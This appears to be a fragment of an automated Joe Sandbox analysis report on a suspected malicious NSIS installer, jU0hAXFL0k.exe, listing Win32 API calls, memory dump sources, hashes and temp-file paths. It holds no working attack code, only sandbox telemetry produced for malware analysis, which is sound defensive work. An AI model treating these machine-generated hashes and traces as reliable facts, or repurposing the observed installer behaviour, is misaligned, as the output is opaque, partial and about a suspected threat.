                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Char$Next$Prev
                                                                                        • String ID: "C:\Users\user\Desktop\jU0hAXFL0k.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 589700163-2995378841
                                                                                        • Opcode ID: 6ae2be844214803d006e8a2b4c6c3a53132e84b4cb1e19317121ab57d6ea06c4
                                                                                        • Instruction ID: 98a55a52ac5494643caf5fd5857683424a9a77f1076ac2e6562e20d377716777
                                                                                        • Opcode Fuzzy Hash: 6ae2be844214803d006e8a2b4c6c3a53132e84b4cb1e19317121ab57d6ea06c4
                                                                                        • Instruction Fuzzy Hash: EE11E25180879029EB3226344C40B7B7F988F5B760F2904FFE9D6722C2D67C5C52876E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetWindowLongA.USER32(?,000000EB), ref: 004040EC
                                                                                        • GetSysColor.USER32(00000000), ref: 0040412A
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00404136
                                                                                        • SetBkMode.GDI32(?,?), ref: 00404142
                                                                                        • GetSysColor.USER32(?), ref: 00404155
                                                                                        • SetBkColor.GDI32(?,?), ref: 00404165
                                                                                        • DeleteObject.GDI32(?), ref: 0040417F
                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00404189
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2320649405-0
                                                                                        • Opcode ID: 85c1166dd3296ad08f2f8f2b617086cce748397ee5d912704cef396037712cfd
                                                                                        • Instruction ID: 778babcb3f3cb4702814cedc7f3687c69535c8aec6342fb1ab2b401637f1774e
                                                                                        • Opcode Fuzzy Hash: 85c1166dd3296ad08f2f8f2b617086cce748397ee5d912704cef396037712cfd
                                                                                        • Instruction Fuzzy Hash: 8A21C7715047049BC7309F78DC4CB5BBBF8AF91710B048A2AEA96A62E0D334E884CB55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 6FE91215: GlobalAlloc.KERNELBASE(?,6FE91233,?,6FE912CF,-6FE9404B,6FE911AB,-000000A0), ref: 6FE9121D
                                                                                        • GlobalFree.KERNEL32(?), ref: 6FE925DE
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE92618
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064096219997.000000006FE91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE90000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064096174223.000000006FE90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064096271269.000000006FE93000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064096311549.000000006FE95000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6fe90000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Free$Alloc
                                                                                        • String ID:
                                                                                        • API String ID: 1780285237-0
                                                                                        • Opcode ID: 29db057164d7b70d4b93398e7069bd715fcd77c750b1c45c2bf3f94f0eb0a635
                                                                                        • Instruction ID: 35d8517f0394bdedbca571751161a82440219b189489d94f34908b4e866b7e78
                                                                                        • Opcode Fuzzy Hash: 29db057164d7b70d4b93398e7069bd715fcd77c750b1c45c2bf3f94f0eb0a635
                                                                                        • Instruction Fuzzy Hash: 29419DB2148600EFCB01CFA4CD98C2A7FBEEB97314B20456EF51586250D736A915DB72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049D6
                                                                                        • GetMessagePos.USER32 ref: 004049DE
                                                                                        • ScreenToClient.USER32(?,?), ref: 004049F8
                                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A0A
                                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A30
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$Send$ClientScreen
                                                                                        • String ID: f
                                                                                        • API String ID: 41195575-1993550816
                                                                                        • Opcode ID: b655f89ca4bb62ef2ecf269f26a72b4f16410e1a4a94cceed0b0bba942de31e0
                                                                                        • Instruction ID: 78e79842b3afbaa1123eb4bc953d8a824fe30bd623f786c3032228cde2642f29
                                                                                        • Opcode Fuzzy Hash: b655f89ca4bb62ef2ecf269f26a72b4f16410e1a4a94cceed0b0bba942de31e0
                                                                                        • Instruction Fuzzy Hash: DA018071D40218BAEB00DB94DC81BFEBBB8AB45B11F10412BBA00B61D0C7B469418BA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetDC.USER32(?), ref: 00401E02
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401E35
                                                                                        • CreateFontIndirectA.GDI32(0040A7E8), ref: 00401E84
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                        • String ID: Calibri
                                                                                        • API String ID: 3808545654-1409258342
                                                                                        • Opcode ID: 02699fb8e5746cd42e9bc81a7398f0b4a801f797f07dd38d0fd2bed2daf6de53
                                                                                        • Instruction ID: f74e6b169c59b5c86824efe7ff79e827475fcd3c365d9a6f340974a330803a43
                                                                                        • Opcode Fuzzy Hash: 02699fb8e5746cd42e9bc81a7398f0b4a801f797f07dd38d0fd2bed2daf6de53
                                                                                        • Instruction Fuzzy Hash: 6001B571948341AFE7019BB0AE49F9A7FB4EB15304F108479F201B72E2C6B851509B2F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402CF8
                                                                                        • MulDiv.KERNEL32(00135201,?,00136C20), ref: 00402D23
                                                                                        • wsprintfA.USER32 ref: 00402D33
                                                                                        • SetWindowTextA.USER32(?,?), ref: 00402D43
                                                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D55
                                                                                        Strings
                                                                                        • verifying installer: %d%%, xrefs: 00402D2D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                        • String ID: verifying installer: %d%%
                                                                                        • API String ID: 1451636040-82062127
                                                                                        • Opcode ID: be9cfeef7a30176cc4b43e70d30b18a0c7ce5305aee0f330691da59d71d99e6c
                                                                                        • Instruction ID: 989b2dafafbc5add767bef13d928cf85595003a1ad1b8b7172a09c7de12a9e27
                                                                                        • Opcode Fuzzy Hash: be9cfeef7a30176cc4b43e70d30b18a0c7ce5305aee0f330691da59d71d99e6c
                                                                                        • Instruction Fuzzy Hash: 3801EC71A40209ABEF20AF60DD49FAE3769EB04305F008039FA06AA1D0D7B599558F59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE92447
                                                                                          • Part of subcall function 6FE91224: lstrcpynA.KERNEL32(00000000,?,6FE912CF,-6FE9404B,6FE911AB,-000000A0), ref: 6FE91234
                                                                                        • GlobalAlloc.KERNEL32(?,?), ref: 6FE923C2
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6FE923D7
                                                                                        • GlobalAlloc.KERNEL32(?,?), ref: 6FE923E8
                                                                                        • CLSIDFromString.OLE32(00000000,00000000), ref: 6FE923F6
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE923FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064096219997.000000006FE91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE90000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064096174223.000000006FE90000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 00000005.00000002.2064096271269.000000006FE93000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 00000005.00000002.2064096311549.000000006FE95000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6fe90000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                        • String ID:
                                                                                        • API String ID: 3730416702-0
                                                                                        • Opcode ID: 0a0edeee5f42947e8b7a7f4bc894caf67546c4dedbb2d1651709b925489a9552
                                                                                        • Instruction ID: 8606e4d46b547c1ad056f9e4910bf5e1a44054db64fe312b6f20de0601a82a55
                                                                                        • Opcode Fuzzy Hash: 0a0edeee5f42947e8b7a7f4bc894caf67546c4dedbb2d1651709b925489a9552
                                                                                        • Instruction Fuzzy Hash: F441BDB1908301EFDB10DF649944B6ABFE9FF52325F208A6EE459CA280D730A545CB72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00405B73: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\jU0hAXFL0k.exe,80000000,00000003), ref: 00405B77
                                                                                          • Part of subcall function 00405B73: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B99
                                                                                        • GlobalAlloc.KERNEL32(?,?), ref: 004027F7
                                                                                        • CloseHandle.KERNEL32(?), ref: 00402877
                                                                                          • Part of subcall function 004031ED: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F89,?), ref: 004031FB
                                                                                        • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 00402813
                                                                                        • GlobalFree.KERNEL32(?), ref: 0040284C
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040285F
                                                                                          • Part of subcall function 00402FFB: GetTickCount.KERNEL32 ref: 00403059
                                                                                          • Part of subcall function 00402FFB: GetTickCount.KERNEL32 ref: 004030DA
                                                                                          • Part of subcall function 00402FFB: MulDiv.KERNEL32(7FFFFFFF,?,00000020), ref: 00403107
                                                                                          • Part of subcall function 00402FFB: wsprintfA.USER32 ref: 00403117
                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040288B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2082585436-0
                                                                                        • Opcode ID: 6686f05f3e5ec83b6cca2b9f62aa3083e219101479c7e8b0ab6b46277f5706d6
                                                                                        • Instruction ID: e2ea0a92745ef5ca30714559c2a0b3d33caec716b30018bf1858ba20d9c2dcb2
                                                                                        • Opcode Fuzzy Hash: 6686f05f3e5ec83b6cca2b9f62aa3083e219101479c7e8b0ab6b46277f5706d6
                                                                                        • Instruction Fuzzy Hash: 44216A72C00128BBCF116FA5CD48CAE7F79EF09364B10823AF524762E0C67959419BA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(Trochidae Setup: Installing,Trochidae Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,004047CC,000000DF,00000000,00000400,?), ref: 0040494F
                                                                                        • wsprintfA.USER32 ref: 00404957
                                                                                        • SetDlgItemTextA.USER32(?,Trochidae Setup: Installing), ref: 0040496A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                        • String ID: %u.%u%s%s$Trochidae Setup: Installing
                                                                                        • API String ID: 3540041739-3189352601
                                                                                        • Opcode ID: 12f6fa3731befb5ff2bd286decedb689321e5faf0d4acc7877b9e8059f00797d
                                                                                        • Instruction ID: 99a67daf6c97d227f7cf07030b4f4762c36886faa54bbd44db56b2f9a5a008fd
                                                                                        • Opcode Fuzzy Hash: 12f6fa3731befb5ff2bd286decedb689321e5faf0d4acc7877b9e8059f00797d
                                                                                        • Instruction Fuzzy Hash: 4F110D7350812937DB00656D9C45EEF328CDF85374F254637FA25F21D1EA78DC1252A8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?), ref: 00401D58
                                                                                        • GetClientRect.USER32(?,?), ref: 00401D9F
                                                                                        • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DCD
                                                                                        • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401DDD
                                                                                        • DeleteObject.GDI32(00000000), ref: 00401DF4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                        • String ID:
                                                                                        • API String ID: 1849352358-0
                                                                                        • Opcode ID: 7c7b994fc4d91fb582f8b78dced405722323d32c4ba5efb8ea940f8c293222a4
                                                                                        • Instruction ID: 879b8917e8c3c9b7c2a93b5436fc05cb0971dbd0d1073f8587bede8dddcc77ec
                                                                                        • Opcode Fuzzy Hash: 7c7b994fc4d91fb582f8b78dced405722323d32c4ba5efb8ea940f8c293222a4
                                                                                        • Instruction Fuzzy Hash: CC2196B2E04109AFDB01DF98DD44AEE7BB5FB48300F10803AF905F6290C7789941CB58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00405FDA: lstrcpynA.KERNEL32(?,?,00000400,00403307,00422F00,NSIS Error,?,00000006,?,0000000A), ref: 00405FE7
                                                                                          • Part of subcall function 00405A0B: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,?,00405A77,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,76403410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A19
                                                                                          • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A1E
                                                                                          • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A32
                                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,76403410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405AB3
                                                                                        • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,76403410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,76403410,C:\Users\user\AppData\Local\Temp\), ref: 00405AC3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsz7A32.tmp
                                                                                        • API String ID: 3248276644-3971072914
Uniqueness
• Uniqueness Score: -1.00%

APIs
• lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403222,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,?,0000000A), ref: 00405978
• CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403222,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,?,0000000A), ref: 00405981
• lstrcatA.KERNEL32(?,00409014,?,00000006,?,0000000A), ref: 00405992
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405972
Memory Dump Source
• Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
Similarity
• API ID: CharPrevlstrcatlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 2659869361-787714339
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD
Memory Dump Source
• Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
Similarity
• API ID: Close$Enum
• String ID:
• API String ID: 464197530-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,?,00405A77,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,76403410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A19
• CharNextA.USER32(00000000), ref: 00405A1E
• CharNextA.USER32(00000000), ref: 00405A32
Strings
• C:\Users\user\AppData\Local\Temp\nsz7A32.tmp, xrefs: 00405A0C
Memory Dump Source
• Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
Similarity
• API ID: CharNext
• String ID: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp
• API String ID: 3213498283-3296606243
Uniqueness
• Uniqueness Score: -1.00%

APIs
• DestroyWindow.USER32(00000000,00000000,00402F3E,?), ref: 00402D73
• GetTickCount.KERNEL32 ref: 00402D91
• CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DAE
• ShowWindow.USER32(00000000,00000005), ref: 00402DBC
Memory Dump Source
• Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• IsWindowVisible.USER32(?), ref: 004050A4
• CallWindowProcA.USER32(?,?,?,?), ref: 004050F5
  • Part of subcall function 004040B4: SendMessageA.USER32(00010410,00000000,00000000,00000000), ref: 004040C6
Memory Dump Source
• Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004056A2
• CloseHandle.KERNEL32(?), ref: 004056AF
Strings
• Error launching installer, xrefs: 0040568C
Memory Dump Source
• Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
